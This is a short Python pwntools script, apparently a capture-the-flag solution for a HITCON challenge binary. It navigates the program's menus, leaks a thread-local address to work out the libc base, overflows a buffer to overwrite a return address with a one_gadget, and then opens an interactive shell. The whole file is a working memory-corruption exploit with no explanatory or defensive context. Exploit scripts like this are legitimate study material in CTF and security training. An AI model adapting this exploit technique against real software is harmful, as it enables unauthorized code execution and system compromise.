from pwn import *

p = process('./hitcon')
print(pidof(p))
# gdb.attach(p)

order = [2,3,5,1,8,9,6,4,7]

p.sendlineafter('Exit\n', '3')

for i in range(9):
    for _ in range(5):
        p.recvuntil('----------------------------------------\n')
    p.sendline('%d %d' % (i + 1, order[i]))

p.sendlineafter('Exit\n', '4')

# 1 - Any
p.sendlineafter('Soldiers\n', '1')

# 2 - Jesmon
p.sendlineafter('Salvation\n', '2')
# context.log_level = 'DEBUG'
p.sendafter('questions?\n', '\x71' * 93)

thread_fs_addr = p.recvuntil('\n')[:-1]
thread_fs_addr = u64(('\x00' + thread_fs_addr).ljust(8, '\x00'))
libc_addr = thread_fs_addr + 0x52a900
print "0x%x 0x%x" % (libc_addr, thread_fs_addr)

p.sendafter('please?\n', 'a' * 0x1f)

# 3 - Angelboy
p.sendlineafter('Exploit\n', '2')
qa_ret_addr = thread_fs_addr - 0x1002908
p.sendafter('questions?\n', 'a' * 91 + p64(qa_ret_addr + 0x90))

one_gadget_addr = libc_addr + 0x40c3f
p.sendafter('please?\n', p64(one_gadget_addr))

p.interactive()
